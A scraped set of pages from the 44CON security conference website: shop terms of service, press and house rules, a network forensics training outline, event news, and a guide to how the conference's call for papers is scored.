          Please read these Terms of Service carefully before accessing or using our website. By accessing or using any part of the site, you agree to be bound by these Terms of Service. If you do not agree to all the terms and conditions of this agreement, then you may not access the website or use any services. If these Terms of Service are considered an offer, acceptance is expressly limited to these Terms of Service. 

           

          Any new features or tools which are added to the current store shall also be subject to the Terms of Service. You can review the most current version of the Terms of Service at any time on this page. We reserve the right to update, change or replace any part of these Terms of Service by posting updates and/or changes to our website. It is your responsibility to check this page periodically for changes. Your continued use of or access to the website following the posting of any changes constitutes acceptance of those changes.

           

          Our store is hosted on Shopify Inc. They provide us with the online e-commerce platform that allows us to sell our products and services to you. 

           

          SECTION 1 - ONLINE STORE TERMS

           

          By agreeing to these Terms of Service, you represent that you are at least the age of majority in your state or province of residence, or that you are the age of majority in your state or province of residence and you have given us your consent to allow any of your minor dependents to use this site. 

          You may not use our products for any illegal or unauthorized purpose nor may you, in the use of the Service, violate any laws in your jurisdiction (including but not limited to copyright laws).

          You must not transmit any worms or viruses or any code of a destructive nature.

          A breach or violation of any of the Terms will result in an immediate termination of your Services.

           

          SECTION 2 - GENERAL CONDITIONS

           

          We reserve the right to refuse service to anyone for any reason at any time.

          You understand that your content (not including credit card information), may be transferred unencrypted and involve (a) transmissions over various networks; and (b) changes to conform and adapt to technical requirements of connecting networks or devices. Credit card information is always encrypted during transfer over networks.

          You agree not to reproduce, duplicate, copy, sell, resell or exploit any portion of the Service, use of the Service, or access to the Service or any contact on the website through which the service is provided, without express written permission by us.

          The headings used in this agreement are included for convenience only and will not limit or otherwise affect these Terms.

           

          SECTION 3 - ACCURACY, COMPLETENESS AND TIMELINESS OF INFORMATION 

           

          We are not responsible if information made available on this site is not accurate, complete or current. The material on this site is provided for general information only and should not be relied upon or used as the sole basis for making decisions without consulting primary, more accurate, more complete or more timely sources of information. Any reliance on the material on this site is at your own risk. 

          This site may contain certain historical information. Historical information, necessarily, is not current and is provided for your reference only. We reserve the right to modify the contents of this site at any time, but we have no obligation to update any information on our site. You agree that it is your responsibility to monitor changes to our site.

           

          SECTION 4 - MODIFICATIONS TO THE SERVICE AND PRICES

           

          Prices for our products are subject to change without notice.

          We reserve the right at any time to modify or discontinue the Service (or any part or content thereof) without notice at any time.

          We shall not be liable to you or to any third-party for any modification, price change, suspension or discontinuance of the Service.

          The total price is inclusive of any applicable value added tax.

           

          SECTION 5 - PRODUCTS OR SERVICES (if applicable)

           

          Certain products or services may be available exclusively online through the website. These products or services may have limited quantities and are subject to return or exchange only according to our Return Policy.

          We have made every effort to display as accurately as possible the colors and images of our products that appear at the store. We cannot guarantee that your computer monitor's display of any color will be accurate.

          We reserve the right, but are not obligated, to limit the sales of our products or Services to any person, geographic region or jurisdiction. We may exercise this right on a case-by-case basis. We reserve the right to limit the quantities of any products or services that we offer. All descriptions of products or product pricing are subject to change at any time without notice, at our sole discretion. We reserve the right to discontinue any product at any time. Any offer for any product or service made on this site is void where prohibited.

          We do not warrant that the quality of any products, services, information, or other material purchased or obtained by you will meet your expectations, or that any errors in the Service will be corrected.

           

          SECTION 6 - ACCURACY OF BILLING AND ACCOUNT INFORMATION

           

          We reserve the right to refuse any order you place with us. We may, in our sole discretion, limit or cancel quantities purchased per person, per household or per order. These restrictions may include orders placed by or under the same customer account, the same credit card, and/or orders that use the same billing and/or shipping address. In the event that we make a change to or cancel an order, we may attempt to notify you by contacting the e-mail and/or billing address/phone number provided at the time the order was made. We reserve the right to limit or prohibit orders that, in our sole judgment, appear to be placed by dealers, resellers or distributors.

           

          You agree to provide current, complete and accurate purchase and account information for all purchases made at our store. You agree to promptly update your account and other information, including your email address and credit card numbers and expiration dates, so that we can complete your transactions and contact you as needed.

           

          For more detail, please review our Returns Policy.

           

          SECTION 7 - OPTIONAL TOOLS

           

          We may provide you with access to third-party tools over which we neither monitor nor have any control nor input.

          You acknowledge and agree that we provide access to such tools “as is” and “as available” without any warranties, representations or conditions of any kind and without any endorsement. We shall have no liability whatsoever arising from or relating to your use of optional third-party tools.

          Any use by you of optional tools offered through the site is entirely at your own risk and discretion and you should ensure that you are familiar with and approve of the terms on which tools are provided by the relevant third-party provider(s).

          We may also, in the future, offer new services and/or features through the website (including, the release of new tools and resources). Such new features and/or services shall also be subject to these Terms of Service.

           

          SECTION 8 - THIRD-PARTY LINKS

           

          Certain content, products and services available via our Service may include materials from third-parties.

          Third-party links on this site may direct you to third-party websites that are not affiliated with us. We are not responsible for examining or evaluating the content or accuracy and we do not warrant and will not have any liability or responsibility for any third-party materials or websites, or for any other materials, products, or services of third-parties.

          We are not liable for any harm or damages related to the purchase or use of goods, services, resources, content, or any other transactions made in connection with any third-party websites. Please review carefully the third-party's policies and practices and make sure you understand them before you engage in any transaction. Complaints, claims, concerns, or questions regarding third-party products should be directed to the third-party.

           

          SECTION 9 - USER COMMENTS, FEEDBACK AND OTHER SUBMISSIONS

           

          If, at our request, you send certain specific submissions (for example contest entries) or without a request from us you send creative ideas, suggestions, proposals, plans, or other materials, whether online, by email, by postal mail, or otherwise (collectively, 'comments'), you agree that we may, at any time, without restriction, edit, copy, publish, distribute, translate and otherwise use in any medium any comments that you forward to us. We are and shall be under no obligation (1) to maintain any comments in confidence; (2) to pay compensation for any comments; or (3) to respond to any comments. 

          We may, but have no obligation to, monitor, edit or remove content that we determine in our sole discretion is unlawful, offensive, threatening, libelous, defamatory, pornographic, obscene or otherwise objectionable or violates any party’s intellectual property or these Terms of Service.

          You agree that your comments will not violate any right of any third-party, including copyright, trademark, privacy, personality or other personal or proprietary right. You further agree that your comments will not contain libelous or otherwise unlawful, abusive or obscene material, or contain any computer virus or other malware that could in any way affect the operation of the Service or any related website. You may not use a false e-mail address, pretend to be someone other than yourself, or otherwise mislead us or third-parties as to the origin of any comments. You are solely responsible for any comments you make and their accuracy. We take no responsibility and assume no liability for any comments posted by you or any third-party.

           

          SECTION 10 - PERSONAL INFORMATION

           

          Your submission of personal information through the store is governed by our Privacy Policy.

           

          SECTION 11 - ERRORS, INACCURACIES AND OMISSIONS

           

          Occasionally there may be information on our site or in the Service that contains typographical errors, inaccuracies or omissions that may relate to product descriptions, pricing, promotions, offers, product shipping charges, transit times and availability. We reserve the right to correct any errors, inaccuracies or omissions, and to change or update information or cancel orders if any information in the Service or on any related website is inaccurate at any time without prior notice (including after you have submitted your order).

          We undertake no obligation to update, amend or clarify information in the Service or on any related website, including without limitation, pricing information, except as required by law. No specified update or refresh date applied in the Service or on any related website, should be taken to indicate that all information in the Service or on any related website has been modified or updated. 

           

          SECTION 12 - PROHIBITED USES

           

          In addition to other prohibitions as set forth in the Terms of Service, you are prohibited from using the site or its content: (a) for any unlawful purpose; (b) to solicit others to perform or participate in any unlawful acts; (c) to violate any international, federal, provincial or state regulations, rules, laws, or local ordinances; (d) to infringe upon or violate our intellectual property rights or the intellectual property rights of others; (e) to harass, abuse, insult, harm, defame, slander, disparage, intimidate, or discriminate based on gender, sexual orientation, religion, ethnicity, race, age, national origin, or disability; (f) to submit false or misleading information; (g) to upload or transmit viruses or any other type of malicious code that will or may be used in any way that will affect the functionality or operation of the Service or of any related website, other websites, or the Internet; (h) to collect or track the personal information of others; (i) to spam, phish, pharm, pretext, spider, crawl, or scrape; (j) for any obscene or immoral purpose; or (k) to interfere with or circumvent the security features of the Service or any related website, other websites, or the Internet. We reserve the right to terminate your use of the Service or any related website for violating any of the prohibited uses.

           

          SECTION 13 - DISCLAIMER OF WARRANTIES; LIMITATION OF LIABILITY

           

          We do not guarantee, represent or warrant that your use of our service will be uninterrupted, timely, secure or error-free. 

          We do not warrant that the results that may be obtained from the use of the service will be accurate or reliable. 

          You agree that from time to time we may remove the service for indefinite periods of time or cancel the service at any time, without notice to you.

          You expressly agree that your use of, or inability to use, the service is at your sole risk. The service and all products and services delivered to you through the service are (except as expressly stated by us) provided 'as is' and 'as available' for your use, without any representation, warranties or conditions of any kind, either express or implied, including all implied warranties or conditions of merchantability, merchantable quality, fitness for a particular purpose, durability, title, and non-infringement.

          In no case shall 44CON, our directors, officers, employees, affiliates, agents, contractors, interns, suppliers, service providers or licensors be liable for any injury, loss, claim, or any direct, indirect, incidental, punitive, special, or consequential damages of any kind, including, without limitation lost profits, lost revenue, lost savings, loss of data, replacement costs, or any similar damages, whether based in contract, tort (including negligence), strict liability or otherwise, arising from your use of any of the service or any products procured using the service, or for any other claim related in any way to your use of the service or any product, including, but not limited to, any errors or omissions in any content, or any loss or damage of any kind incurred as a result of the use of the service or any content (or product) posted, transmitted, or otherwise made available via the service, even if advised of their possibility. Because some states or jurisdictions do not allow the exclusion or the limitation of liability for consequential or incidental damages, in such states or jurisdictions, our liability shall be limited to the maximum extent permitted by law.

           

          SECTION 14 - INDEMNIFICATION

           

          You agree to indemnify, defend and hold harmless 44CON and our parent, subsidiaries, affiliates, partners, officers, directors, agents, contractors, licensors, service providers, subcontractors, suppliers, interns and employees, from any claim or demand, including reasonable attorneys’ fees, made by any third-party due to or arising out of your breach of these Terms of Service or the documents they incorporate by reference, or your violation of any law or the rights of a third-party.

           

          SECTION 15 - SEVERABILITY

           

          In the event that any provision of these Terms of Service is determined to be unlawful, void or unenforceable, such provision shall nonetheless be enforceable to the fullest extent permitted by applicable law, and the unenforceable portion shall be deemed to be severed from these Terms of Service, such determination shall not affect the validity and enforceability of any other remaining provisions.

           

          SECTION 16 - TERMINATION

           

          The obligations and liabilities of the parties incurred prior to the termination date shall survive the termination of this agreement for all purposes.

          These Terms of Service are effective unless and until terminated by either you or us. You may terminate these Terms of Service at any time by notifying us that you no longer wish to use our Services, or when you cease using our site.

          If in our sole judgment you fail, or we suspect that you have failed, to comply with any term or provision of these Terms of Service, we also may terminate this agreement at any time without notice and you will remain liable for all amounts due up to and including the date of termination; and/or accordingly may deny you access to our Services (or any part thereof).

           

          SECTION 17 - ENTIRE AGREEMENT

           

          The failure of us to exercise or enforce any right or provision of these Terms of Service shall not constitute a waiver of such right or provision. 

          These Terms of Service and any policies or operating rules posted by us on this site or in respect to the Service constitute the entire agreement and understanding between you and us and govern your use of the Service, superseding any prior or contemporaneous agreements, communications and proposals, whether oral or written, between you and us (including, but not limited to, any prior versions of the Terms of Service).

          Any ambiguities in the interpretation of these Terms of Service shall not be construed against the drafting party.

           

          SECTION 18 - GOVERNING LAW

           

          These Terms of Service and any separate agreements whereby we provide you Services shall be governed by and construed in accordance with the laws of England and any dispute shall be finally resolved by the English courts.

           

          SECTION 19 - DELIVERY

           

          Merchandise (purchased on their own)

          UK orders will be delivered using Royal Mail and International orders will be despatched via Royal Mail or Parcel Force. 

          Merchandise (purchased with conference ticket)

          They will be available for pick-up at the conference at the registration/merchandise desk upon presentation of proof of purchase.

          Pre-ordered DVDs will be shipped after the conference.

          Conference ticket

          Conference tickets will be sent electronically.

           

          SECTION 20 - CANCELLATIONS AND RETURNS

           

          Merchandise Returns

          We hope that you will be delighted with your purchases from 44CON. If however, you want to return your purchase, you may do so within 14 days of your purchase, provided that your purchase is in its original condition. Please contact us at 44con@44con.com before returning any purchase.

          Please note that you will be responsible for the postage costs of the items returned unless we delivered the item to you in error, or if the item is damaged or defective.

          Once your return is received and inspected, we will send you an email to notify you that we have received your returned item. We will also notify you of the approval or rejection of your refund.

          If you are approved, then your refund will be processed, and a credit will automatically be applied to your credit card or original method of payment, within a certain amount of days. 

          Conference Tickets

          Conference and training tickets are non-refundable.

          In the event that a ticket holder is unable to attend, a substitute may attend in their place provided that the organisers are notified in advance of the conference.  Please contact 44con@44con.com to arrange or if you want help with the substitution.

          Training courses require a minimum number of attendees to be conducted. We reserve the right to cancel a course if minimum numbers are not reached up to 2 weeks prior to the event. In the event that a course is cancelled, we will notify the ticket holders and offer to transfer them to another course or provide refund information. 

           

          SECTION 21 - CHANGES TO TERMS OF SERVICE

           

          You can review the most current version of the Terms of Service at any time at this page. 

          We reserve the right, at our sole discretion, to update, change or replace any part of these Terms of Service by posting updates and changes to our website. It is your responsibility to check our website periodically for changes. Your continued use of or access to our website or the Service following the posting of any changes to these Terms of Service constitutes acceptance of those changes.

           

          SECTION 22 - CONTACT INFORMATION

           

          Questions about the Terms of Service should be sent to us at 44con@44con.com.


           

          #####EOF##### Press Information – 44CON

          Press Information

          This page contains information relevant to members of the press. Whether you’re thinking of covering 44CON for your personal blog or a mainstream media outlet, we’d appreciate it if you read this anyway.

          Press Office

          There is a press office at our conferences where registered members of the press can conduct interviews and access the 44CON press team. The room has sufficient space for stands, cameras and microphones to be set up but this has to be arranged in advance.

          Guidelines

          44CON conferences are events for all sorts of information security related people who come from many walks of life and have different world views. People expect a certain right to non-intrusive behaviour. While registered press are welcome, unregistered press members will be asked to leave. In order to make everyone’s experience better, the following house rules apply:

          • Press must register as press in advance
          • Your press pass must be worn at all times
          • Except for 44CON photographers, filming and photography is not permitted in the auditorium area
          • No pictures of participants may be taken without explicit permission
          • A certain number of free press tickets are available – please contact us for details
          • If you are writing an article about 44CON please let us know in advance so we can link to your organisation’s web site

          If in doubt, please ask a helper as ejection from the conference often offends. For registration, queries and notification please e-mail us.

          #####EOF##### 44CON House Rules – 44CON

          44CON House Rules

          44CON is welcoming to all. We’ve drafted these house rules to help you understand our guiding behavioural principle: Wheaton’s Law (“Don’t be a dick”). Our house rules aren’t perfect, they’re a work in progress and we’re open to suggestions via houserules@44con.com.

          These rules apply to everyone and all interpersonal interactions at the event.

          Expectations

          What we want you to get from 44CON: Knowledge. New friends. Job Opportunities. Good times.
          What we expect from you: Respect for others. Being kind. Not being a dick.

          Interpreting Wheaton’s Law

          Our crew leads are the arbiters of Wheaton’s Law. Their decision is final. If you’re given an instruction from a crew member, please follow it. If you’re given a warning, please heed it.

          Banter, a playful, friendly exchange of teasing remarks, is fine. If it’s not consensual, it’s not banter.

          Reporting concerns

          1. If you have a concern, please raise it with the clearly visible crew or at the front desk.
          2. Alternatively, please fill in a feedback form, anonymously if you prefer.
          3. If the above isn’t possible, please email houserules@44con.com with your concern.
          4. Everything is handled in confidence and we can provide space and support where needed.

          We welcome anonymous feedback, but it affects our ability to communicate outcomes.

          Grounds for removal

          We reserve the right to remove anyone from the event without reimbursement for, but not limited to, the following behaviours:

          1. Theft.
          2. Sustained harassment, discrimination or disruption.
          3. Acts of violence.
          4. Criminal activity.
          5. Any other reason where the relevant crew lead believes that your continued presence may cause a risk to the safety of yourself or others, or where Wheaton’s Law has been breached to such a degree that you have acted like an epic dick.

          Please note: Laws at home may not match those here. In particular, free speech isn’t protected, our computer crime laws are ridiculous and both harassment and discrimination are criminal offences.

          #####EOF##### Erik Hjelmvik: Network Forensics Training – 44CON

          Erik Hjelmvik: Network Forensics Training

          Presented By: Erik Hjelmvik

          The network forensics training class consists of a mix of theory and hands-on labs, where students will learn to analyze Full Packet Capture (FPC) files. The scenarios in the labs are primarily focused on network forensics for incident response, but are also relevant for law enforcement, internal security and similar settings where the network traffic of a suspect or insider is being monitored.

          The 2 day course will take place on the 12th & 13th September 2017 at etc venues The Hatton.

          Cost is £1,300.00 (inc VAT). Buy your place in our shop now.

          Course Outline

          Day 1: Theory and Practice using Open Source Tools

          • Theory: Ethernet signalling
          • Hardware: Network TAPs and Monitor ports / SPAN ports
          • Sniffers: Recommendations for high-performance packet interception
          • PCAP analysis: Extracting evidence and indicators of compromise using open source tools
          • Defeating Big Data: Techniques for working with large data sets
          • Whitelists: Learn how to detect 0-day exploit attacks without using IDS signatures
          • Challenge Day 1: Find the needle in our haystack and win an honourable prize!

          Day 2: Advanced Network Forensics using Netresec Tools

          • NetworkMiner Professional: Learning to leverage the features available in the Pro version
            • Port Independent Protocol Identification (PIPI)
            • DNS Whitelisting
          • NetworkMinerCLI: Automating content extraction with our command line tool
          • CapLoader: Searching, sorting and drilling through large PCAP data sets
            • Super fast flow transcript (aka Follow TCP/UDP stream)
            • Filter PCAP files and export frames to other tools
            • Keyword search
          • Challenge Day 2

          The Scenario

          The scenario used in the class involves a new progressive Bank, which provides exchange services for Bitcoin and Litecoin. We’ve set up clients and a server for this bank using REAL physical machines and a REAL internet connection. All traffic on the network is captured to PCAP files by a SecurityOnion sensor. In the scenario this bank gets into lots of trouble with hackers and malware, such as:

          • Defacement of the Bank’s web server (see zone-h mirror)
          • Man-on-the-Side (MOTS) attack (much like NSA/GCHQ’s QUANTUM INSERT)
          • Backdoor infection through trojanized software
          • Spear phishing
          • Use of a popular RAT (njRAT) to access the victim’s machine and exfiltrate the wallet.dat files for Bitcoin and Litecoin
          • Infection with real malware (Nemucod, Miuref / Boaxxe and more)

          Class attendees will learn to analyse captured network traffic from these events in order to:

          • Investigate web server compromises and defacements
          • Detect Man-on-the-Side attacks
          • Identify covert backdoors
          • Reassemble incoming emails and attachments
          • Detect and decode RAT/backdoor traffic
          • Detect malicious traffic without having to rely on blacklists, AV or third-party detection services

          Professional software included FREE of charge

          Each attendee will be provided with a free personal single user license of NetworkMiner Professional and CapLoader. These licenses will be valid for six months from the first training day.

          Target Audience

          Incident responders, digital forensics specialists and anyone else who wants to improve their skills at finding evil stuff in full content packet captures.

          Student Requirements

          Previous experience using Wireshark to analyse network traffic is recommended.

          You don’t need to be a bash expert, but please don’t attend this training if you are afraid of using Linux command line tools.

          What to Bring

          Attendees will need to bring a laptop that fits the following specs:

          • A PC running any 64 bit Windows OS (can be a Virtual Machine)
          • At least 4GB RAM
          • At least 40 GB free disk space
          • VirtualBox (64 bit) installed (VMWare will not be supported in the training)

          A VirtualBox VM will be provided on USB flash drives at the beginning of the training.

          Please note that having a 64-bit CPU and a 64-bit OS is not always enough to support 64-bit virtualisation. You might need to enable features such as “AMD-V”, “VT-x” or “Hyper-V” in BIOS in order to run virtual machines in 64-bit mode. You might also need to turn off “Intel Trusted Execution” in BIOS. One way to verify that your laptop supports 64-bit virtualisation is to download the SecurityOnion ISO and see if it boots up in VirtualBox.

          About the Trainer

          Erik Hjelmvik is an incident responder and developer who is well known in the network forensics field for having created NetworkMiner, which is used by incident responders and law enforcement all around the world. Erik has a background in SCADA security and has spent over 5 years doing incident response at one of the best CERTs in Sweden. Nowadays Erik runs the company Netresec AB, where he develops network forensics software and occasionally teaches network forensic classes.

           

          Book your 44CON 2017 training course now!

          #####EOF##### Nathalie – 44CON

          Tickets for 44CON 2016 are on sale

          44CON 2016 tickets are now on sale in our shop. Go and get yours now!

          We also have 4 great training courses by Saumil Shah, Dawid Czagan, Joe FitzPatrick, Dominic Chell and Marcus Pinto. Go check them out and book your place early to avoid disappointment, as courses will be cancelled if minimum numbers are not reached 3 weeks before the conference.

          44CON is the UK’s premier annual technical security conference and training event. 44CON 2016 will be taking place from the evening of the 14th September until the 16th September at the ILEC Conference Centre. You can expect a jam-packed few days of awesome talks, food and of course alcohol.

          Our CFP closes tonight (Friday 10th June), so if you have something awesome to share, get it in now before it’s too late.

          Finally, check this great day out at the Farnborough International Air Show from our friends at Suits & Spooks on 14th July, Counterespionage: the need for speed, and use the code 44CON for a 5% discount on both package options.

          Dawid Czagan’s training course is still going ahead

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan’s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, on the 27th and 28th April 2016. It will take place at the ILEC Conference Centre.

          Do check it out!

          44CON Cyber Security 2016 Cancelled

          Unfortunately we’ve had some problems with the 44CON Cyber Security event that we just couldn’t overcome. Some of these issues were small, like crew numbers, while others such as unexpected price hikes for us were simply insurmountable without breaking the cost model. Furthermore, the presence of so many great events in the UK from BSides London and Manchester, through to Securitay meant that a separate event was becoming harder to justify in an already busy calendar.

          When we started 44CON Cyber Security last year, we set out to create an exhibition for the Infosec community without the infosuck. We wanted to create an event that was free (or at least super cheap), that was different to 44CON London but had its spirit (if not its Gin) and a place where people more involved in end-user business security functions could come together without the fear of heavy-handed barcode scanning. We believe we mostly succeeded, but only as a result of the enormous effort our crew of volunteers put in and Adrian’s hard work.

          Unfortunately this year both Adrian and Steve have had less time to work on 44CON Cyber Security, and with fewer volunteers able to plug the gaps, we felt that if we couldn’t deliver an event on par with last year that perhaps it would be better to focus on making 44CON London an even better event, which is what we’re going to do.

          We’ll be in touch with everyone with a ticket for 44CON Cyber Security to let them know that it’s not going ahead, and to give them the option of a full refund or discounted entry to 44CON London, and of course to apologise for any inconvenience. But it’s not all bad news…

          Traditionally, 44CON London has had an Infosec track and a technical track. Last year had no Infosec track because of 44CON Cyber Security. This year, the Infosec track will be back with a vengeance.

          It’s going to be awesome.

          If you have any questions, please email 44con@44con.com, and we’ll do our best.

          Adrian & Steve

          Training course at 44CON Cyber Security 2016

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan’s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, which we will be running after 44CON Cyber Security 2016, on the 27th and 28th April 2016. It will hopefully take place at the same venue as the conference.

          Do check it out!

          44CON sponsor CRESTcon & IISP Congress

          44CON are pleased to announce that we are sponsoring the CRESTcon & IISP Congress event taking place on 10 March 2016.

          Following the success of the sell-out event in 2015, CRESTCon & IISP Congress 2016 will take place on 10th March at the Royal College of Surgeons. In response to the increased demand for tickets and feedback from delegates, they have expanded the event by adding a third stream and a larger demo area. Get your ticket here quickly!

          44CON London 2015 – Thank you for making it great

          Well, that’s 44CON London over for another year!
          We would like to thank all of our sponsors, speakers and attendees for making this year’s event a success. The atmosphere and great talks made this year’s 44CON London a great place to be. We hope you all managed to bag some nice swag.
          If you didn’t manage to make it to all of the talks then you can see the slides here.
          Now that this year’s 44CON London is over, we will be focusing on our upcoming April event, 44CON Cyber Security. This will be taking place on Tuesday 26th April 2016 at the ILEC Conference Centre, London.
          Tickets will be on sale shortly, so keep a look out on our Twitter page @44CON or sign up to our mailing list, where you will be the first to know about all things 44CON.

          #####EOF##### How to game the 44CON CFP – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5. What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get fewer than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that your main talk is about the theory, and try a play-along walkthrough of how to do it in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes on the first submissions coming in, and voting slowly drops off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.


          #####EOF##### 44CON 2013 Presentations – 44CON

          44CON 2013 Presentations

          A talk about (info-sec) talks

          Presented By: Haroon Meer

          Last year there was an Information Security conference taking place for almost every day of the year. This translates to about 15 information security talks per day, every day. The question is, is this a bad thing? Even niche areas of the info-sec landscape have their own dedicated conference these days. Is this a good thing?

